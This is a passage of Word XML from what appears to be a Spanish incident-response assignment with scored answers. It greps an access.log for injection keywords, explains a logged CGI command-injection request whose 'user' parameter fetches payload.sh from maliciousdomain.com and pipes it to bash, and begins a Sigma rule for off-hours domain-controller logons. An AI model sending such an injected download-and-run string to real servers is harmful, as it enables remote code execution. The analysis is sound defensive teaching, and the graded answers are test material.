        <w:t xml:space="preserve">Para localizar el posible vector de ataque en el servidor web, se ha filtrado el archivo access.log buscando patrones típicos de inyección de comandos, descarga de artefactos y encadenamiento de órdenes (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Se ha empleado el siguiente comando: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -E "wget|curl|chmod|bash|sh|;|%20" access.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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De esta forma se ha identificado la siguiente línea de log:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0086b3"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.5.23 - -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color w:val="0086b3"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/Jun/2025:03:41:17 +0200</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"GET /cgi-bin/status.sh?user=;wget http://maliciousdomain.com/payload.sh -O- | bash HTTP/1.1"</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200</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452</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"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La entrada es compatible con la explotación de una vulnerabilidad de inyección de comandos a través del parámetro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> del script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">status.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. El atacante usa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para cerrar la instrucción esperada e insertar un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que descarga un script y lo redirige directamente a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mediante una tubería. Ese patrón es característico de ejecución remota de comandos sin necesidad de guardar previamente el payload en disco. El código </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica que el CGI procesó la petición; por sí solo no demuestra toda la intrusión, pero sí refuerza que el intento de explotación llegó a ejecutarse en el servidor web.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5976310" cy="4800600"/>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7631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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="397" w:hanging="397"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o2w0e3n4s91y" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto evaluable 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="6aa84f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valor: +2,5 puntos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:ind w:left="397" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Respuesta: </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40" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1434" w:right="0" w:hanging="357"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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Código de regla sigma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66">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Para detectar accesos potencialmente sospechosos fuera del horario habitual en controladores de dominio, se propone la siguiente regla Sigma:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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68">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240"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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">title</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Inicio de sesión de red o RDP fuera de horario en controladores de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:left w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:bottom w:color="000000" w:space="4" w:sz="4" w:val="single"/>
          <w:right w:color="000000" w:space="4" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240"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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</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9b1deb4d</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5b4a</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4c3b</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9b1d</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123456789abc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">status</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experimental</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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color w:val="183691"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">description</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6C">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color w:val="183691"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="183691"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Detecta inicios de sesión de tipo red (3) o RDP (10) en controladores de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">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183691"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    realizados fuera del horario de operación estándar (08:00 a 19:00).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">author</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Henri Daniel Peña Dequero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">date</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2026/04/13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logsource</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1">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">product</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windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service</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security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">detection</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4">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">selection_logon</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5">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EventID</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4624</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LogonType</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7">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3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">selection_dc</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A">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ComputerName|contains</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B">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DC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">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63a35c"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f5f5f5" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">business_hours</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D">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@timestamp</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hour</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E">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8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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9</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">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10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">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11</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">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12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">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13</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">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14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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15</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">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16</w:t>
